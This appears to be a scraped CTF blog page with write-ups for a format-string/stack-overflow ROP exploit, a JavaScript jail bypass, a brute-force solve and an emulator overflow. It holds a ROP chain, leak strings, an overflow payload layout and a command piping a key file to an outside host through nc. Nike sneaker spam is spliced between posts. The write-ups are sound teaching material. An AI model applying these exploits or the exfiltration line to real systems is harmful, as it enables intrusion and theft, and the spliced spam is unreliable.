  int canary; // [sp+10Ch] [bp-Ch]@1

  canary = *MK_FP(__GS__, 20);
  fwrite("Welcome to Guess The Number Online!\n\n", 1u, 37, hFile);
  v3 = get_system_time_0(0);
  srand(v3);
  v7 = rand() % 20;
  while ( 1 )
  {
    fwrite("Pick a number between 0 and 20: ", 1u, 32, hFile);
    fflush(hFile);
    if ( !recv_to_buffer(v9, 1024, hFile) )
      break;
    v8 = sub_805C210(v9, 10);
    if ( v8 )
      *v8 = 0;
    if ( v9[0] == 'q' )
      break;
    if ( to_int(v9) == v7 )
    {
      fwrite("You win! Congratulations!\n\n", 1u, 27, hFile);
      fflush(hFile);
      break;
    }
    fwrite("Your number is ", 1u, 15, hFile);
    fprintf(hFile, v9);
    if ( to_int(v9) <= v7 )
      v4 = "low";
    else
      v4 = "high";
    fprintf(hFile, " which is too %s.\n", v4);
    fflush(hFile);
  }
  fwrite("Bye\n", 1u, 4, hFile);
  fflush(hFile);
  result = *MK_FP(__GS__, 20) ^ canary;
  if ( *MK_FP(__GS__, 20) != canary )
    sub_80610A0(v5);
  return result;
};

As we can see there is an obvious stack overflow and format string vulnerabilities. Using format string vulnerability we can determine canary's value. Then we can overflow stack, overwrite canary by the same value and successfully reach retn instruction with modified return address.

First try to execute shellcode on the stack (just in case it's executable). For this we need:

get canary value via sending string "%70$08X";
get upper function stack frame (ebp) via sending string "%73$08X";
using upper function stack frame calculate shellcode address;

trigger stack overflow via sending buffer

"A"*256+pack("<I",canary)+"A"*12+pack("<I",ptr_to_shellcode)+shellcode

Unfortunatelly this attempt failed... this means that stack is nonexecutable and because there is no RWE section in binary, we should use ROP.

Another bad news: there is no function "system" among high level api, built in the binary. So only 2 ways remains. The earsiest one is to find function "mprotect", use it to make stack executable and run any shellcode. More complicated one is to build full ROP chain to put needed data somewhere in memory and use it to make sys_execve syscall.

I'd selected the second way.

To find apropriate ROP gadget I'd used Jonathan Salwan's tool, named ROPgadget (official url: http://shell-storm.org/project/ROPgadget/). The only restricted byte is '\n' e.i. 0x0A, so just set option '--badbytes "0A"'.

$ ./ROPgadget.py --binary ~/explicit  --badbytes "0a"

As write-what-where ROP chaine I'd selected next one:

p += pack('<I', 0x08083fc6) # pop edx ; ret
p += pack('<I', dst_addr)   #  where
p += pack('<I', 0x080CED61) # pop eax ; ret
p += pack('<I', data)       #  what
p += pack('<I', 0x0808a73d) # mov dword ptr [edx], eax ; ret

To save my data I'd used .data section (it stast from address 0x080D50C0), because it has RW permitions.

To execute sys_execve we have to imitate execution of next assemply code:

xor edx, edx
mov ebx, pArg0
mov ecx, pArgs
mov eax,11
int 0x80

The only problem was to set ecx to desired value. The best ROP gadget was

0x080CF077 # pop ecx ; or cl, byte ptr [esi] ; or al, 0x43 ; ret

So we have to set to esi address, which points to 0x0 byte value. One of the possible ways is the next:

p += pack('<I', 0x080499f5) # pop esi ; ret
p += pack('<I', 0x080d50c0+0x74) # any addr such that byte ptr [addr] = 0x0
p += pack('<I', 0x080CF077) # pop ecx ; or cl, byte ptr [esi] ; or al, 0x43 ; ret
p += pack('<I', 0x080d50c0+0x60) # ptr to ArgsArray

And to the end for rop chain I put:

p += pack("<I", 0x08049924) # jmp $

It cases infinite loop and help me to determine that my ROP chain has been executed successsfully.

Now we can execute written python script and get the flag "NcN_97740ead1060892a253be8ca33c6364a712b21d2".

Final python script can be found here.

Authentic Nike Sneakers | Women's Nike Air Jordan 1 trainers - Latest Releases , Ietp

Attachments:

eXPLicit.zip

JavaScript jail

villytiger — Mon, 02 Jun 2014 09:14:59 +0000

Category:

web

pwn

Event:

SecuInside CTF Quals 2014

We have an ip address and a port. Connected using netcat we got V8 JavaScript shell. print(Object.keys(this)) gives us all global objects available: print, quit, checker, check.

print(check) gives our pwn target:

function (rand) {
	function stage1() {
		var a = Array.apply(null, new Array(Math.floor(Math.random() * 20) + 10)).map(function () {return Math.random() * 0x10000;});
		var b = rand(a.length);

		if (!Array.isArray(b)) {
			print("You're a cheater!");
			return false;
		}

		if (b.length < a.length) {
			print("hmm.. too short..");
			for (var i = 0, n = a.length - b.length; i < n; i++) {
				delete b[b.length];
				b[b.length] = [Math.random() * 0x10000];
			}
		} else if (b.length > a.length) {
			print("hmm.. too long..");
			for (var i = 0, n = b.length - a.length; i < n; i++)
				Array.prototype.pop.apply(b);
		}

		for (var i = 0, n = b.length; i < n; i++) {
			if (a[i] != b[i]) {
				print("ddang~~");
				return false;
			}
		}

		return true;
	}

	function stage2() {
		var a = Array.apply(null, new Array((myRand() % 20) + 10)).map(function () {return myRand() % 0x10000;});
		var b = rand(a.length);

		if (!Array.isArray(b)) {
			print("You're a cheater!");
			return false;
		}

		if (b.length < a.length) {
			print("hmm.. too short..");
			for (var i = 0, n = a.length - b.length; i < n; i++) {
				delete b[b.length];
				b[b.length] = [Math.random() * 0x10000];
			}
		} else if (b.length > a.length) {
			print("hmm.. too long..");
			for (var i = 0, n = b.length - a.length; i < n; i++)
				Array.prototype.pop.apply(b);
		}

		for (var i = 0, n = b.length; i < n; i++) {
			if (a[i] != b[i]) {
				print("ddang~~");
				return false;
			}
		}

		return true;
	}

	print("stage1");

	if (!stage1())
		return;

	print("stage2");

	if (!stage2())
		return;

	print("awesome!");
	return flag;
}

The flag is contained in closure made by calling checker. Since there is no any legal method to take variables from closure we have to deceive check tests somehow. It's JavaScript baby, we can redefine everything. The simplest solution is to redefine Array.apply in a way it returns empty array and to return empty array from our rand function. Obviously two empty arrays are the same size and have same elements. Let's do it:

Array.apply = function() {return [];};
function rand() {return [];}
check(rand);

This is it.

Sportswear free shipping | Nike Air Force 1'07 Essential blanche et or femme - Chaussures Baskets femme - Gov

Guess the flag (vuln 100)

azrael — Mon, 17 Mar 2014 10:34:41 +0000

Category:

pwn

Event:

RuCTF Quals 2014

There is given service raised at vuln1.quals.ructf.org:16712 and it's ELF 32-bit executable source file.

At first I tried to reverse executable but i'm not a reverse-engeneering-guy so i got nothing :)

Because of task's cost is 100 and I thought than it can't be difficult I connect to vuln1.quals.ructf.org:16712 and started to brute inputs. And I was surprised that after several attempts I got flag RUCTF_f4205156a73b7bd143ab06e7722e3c81f72b8429 with "\" as input string :)

Nike shoes | Nike for Men

Attachments:

guess.zip

risc_emu

villytiger — Wed, 05 Mar 2014 13:59:22 +0000

Category:

pwn

Event:

Boston Key Party 2014

Task:

Pwning : 100

nobody cares about this service nc 54.218.22.41 4545

http://bostonkeyparty.net/challenges/emu-c7c4671145c5bb6ad48682ec0c58b831

Solution:

Connected to the server I was prompted to enter some byte code of the RISC CPU in base64. OK, let's look at the executable through disasm magnifier. After downloading file command said me that it is ELF for x86-64. I started reading opcodes in the binary and found that after decoding base64 input in this beautiful C++ code memcpy betrayer is used to copy decoded data into some global buffer. Look at this (dump from my mind):

So, that's pretty easy to get what we need. Just send 152 bytes with special address on the end. The first byte of the buffer is checked for being greater or equal to 9, and after that main::fun is called with buffer + 1 as the first parmeter.

There is only one problem remained. This is the gap between the byte code buffer and the function pointer. After doing memcpy our risc emulator checks that first 4 bytes of this gap still contain some cookie written in the beginning of the main function. Here is the mind dump with the function producing this cookie:

Now we just need to brute force the server time (hope the server is properly synced) and run system("cat key | nc ctfcrew.org 1337"). Or run ls -al if you aren't assured about flag file name. See the full solution in the attachment.

Authentic Sneakers | Releases Nike Shoes

Attachments:

fuck-the-emu.cpp_.txt